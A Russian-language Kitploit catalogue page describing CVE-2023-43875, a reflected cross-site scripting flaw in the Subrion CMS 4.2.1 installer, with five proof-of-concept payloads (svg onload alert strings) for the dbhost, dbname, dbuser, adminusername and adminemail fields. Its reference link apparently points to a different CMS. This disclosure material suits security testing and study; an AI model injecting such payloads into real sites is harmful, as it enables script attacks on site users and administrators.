Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation — Subrion CMS 4.2.1 подвержен уязвимости межсайтового скриптинга (Cross-Site Scripting, XSS), которая позволяет злоумышленникам выполнять произвольный код с помощью специально сформированной полезной нагрузки в процессе установки. | Kitploit
Инструменты/GitHubGitHub/sromanhu/cve-2023-43875-subrion-cms-reflected-xss---installation
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubsromanhu/cve-2023-43875-subrion-cms-reflected-xss---installation

CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation

Subrion CMS 4.2.1 подвержен уязвимости межсайтового скриптинга (Cross-Site Scripting, XSS), которая позволяет злоумышленникам выполнять произвольный код с помощью специально сформированной полезной нагрузки в процессе установки.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
2 лет назадЕщё не проверено

Subrion CMS: отражённая XSS v4.2.1

Автор: (Sergio)

Описание: Множественные уязвимости межсайтового выполнения сценариев (XSS) в процессе установки Subrion CMS v.4.2.1 позволяют локальному злоумышленнику выполнять произвольные веб-сценарии с помощью специально созданного пейлоада, внедряемого в dbhost, dbname, dbuser, adminusername и adminemail.

Векторы атаки: Уязвимость в санации процесса установки в полях dbhost, dbname, dbuser, adminusername и adminemail позволяет внедрять JavaScript-код.


POC:

Во время процесса установки мы вводим XSS-пейлоад в любое из 5 полей, и при нажатии «Далее» получаем XSS-всплывающее окно.

XSS-пейлоад:

root@kitploit:~
'"><svg/onload=alert('dbhost')>

XSS-пейлоад:

root@kitploit:~
'"><svg/onload=alert('dbname')>

XSS-пейлоад:

root@kitploit:~
'"><svg/onload=alert('dbuser')>

XSS-пейлоад:

root@kitploit:~
'"><svg/onload=alert('adminusername')>

XSS-пейлоад:

root@kitploit:~
'"><svg/onload=alert('adminemail')>

XSS-пейлоад при установке

На следующем изображении виден внедрённый код, который выполняет пейлоад в процессе установки.

dbhost

dbname

dbuser

adminusername

adminemail


Дополнительная информация:

http://www.cmsmadesimple.org/

https://owasp.org/Top10/es/A03_2021-Injection/

Скачать инструмент